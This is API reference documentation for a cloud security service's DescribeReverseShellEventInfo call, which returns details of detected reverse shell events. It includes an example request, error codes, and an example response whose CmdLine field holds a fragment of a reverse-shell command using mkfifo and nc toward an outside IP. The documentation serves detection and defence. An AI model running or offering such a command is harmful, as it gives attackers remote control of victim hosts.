Domain name for API request: cwp.intl.tencentcloudapi.com.
This API is used to query reverse shell details.
A maximum of 20 requests can be initiated per second for this API.
The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.
Parameter Name | Required | Type | Description |
---|---|---|---|
Action | Yes | String | Common Params. The value used for this API: DescribeReverseShellEventInfo. |
Version | Yes | String | Common Params. The value used for this API: 2018-02-28. |
Region | No | String | Common Params. This parameter is not required. |
Id | Yes | Integer | Event ID |
Parameter Name | Type | Description |
---|---|---|
ReverseShellEventInfo | ReverseShellEventInfo | Reverse shell details Note: This field may return null, indicating that no valid values can be obtained. |
RequestId | String | The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem. |
POST / HTTP/1.1
Host: cwp.intl.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: DescribeReverseShellEventInfo
<common request parameters>
{
"Id": 12
}
{
"Response": {
"RequestId": "db8fd5e1-6d57-405b-9f57-9d6d0589bdc8",
"ReverseShellEventInfo": {
"CmdLine": "mkfifo /tmp/pipe nc 1.1.1.1 1234",
"CreateTime": "2024-09-27 15:43:56",
"DetectBy": 1,
"DstIp": "10.0.1.92",
"DstPort": 0,
"FullPath": "/usr/bin/mkfifo",
"HarmDescribe": "After invading the server, in order to carry out the next malicious operation, the hacker will let the victim host create an interactive shell and connect to the hacker's remote control server. Through the established channel, the hacker can send instructions to the victim host and obtain execution results.",
"HostIp": "1.1.1.1",
"Id": 10001,
"MachineName": "Machine name",
"MachineStatus": "ONLINE",
"MachineWanIp": "1.1.1.1",
"ModifyTime": "2024-09-27 15:44:32",
"ParentProcGroup": "root",
"ParentProcName": "nginx",
"ParentProcPath": "nginx",
"ParentProcUser": "0",
"ProcessName": "mkfifo",
"PsTree": "[{\"pid\":\"1\"}]",
"Quuid": "05f0bcab-726c-4ea4-8109-bcd03d5598f7",
"References": [],
"Status": 0,
"SuggestScheme": "1. Check whether there are abnormal network connections in the system.\n2. Isolate or delete related Trojan files.xa0\n3. Conduct risk investigation on the system and perform security reinforcement. For details, refer to the following link: xa0\n[Linux] https://www.tencentcloud.com/document/product/296/9604?from_cn_redirect=1xa0\n[Windows] https://www.tencentcloud.com/document/product/296/9605?from_cn_redirect=1",
"Tags": [],
"UserGroup": "0",
"UserName": "0",
"Uuid": "05f0bcab-726c-4ea4-8109-bcd03d5598f7"
}
}
}
TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.
The following only lists the error codes related to the API business logic. For other error codes, see Common Error Codes.
Error Code | Description |
---|---|
InternalError | Internal error |
InternalError.MainDBFail | Failed to manipulate the data. |
InvalidParameter | Incorrect parameter. |
InvalidParameter.InvalidFormat | Incorrect parameter format. |
InvalidParameter.MissingParameter | Missing parameter. |
InvalidParameter.ParsingError | Incorrect parameter parsing. |
InvalidParameterValue | Invalid parameter value. |
MissingParameter | Missing parameter error. |
ResourceNotFound | The resource does not exist. |
ResourceNotFound.MachineNotFound | The scanning machine does not exist. |
ResourceUnavailable | The resource is not available. |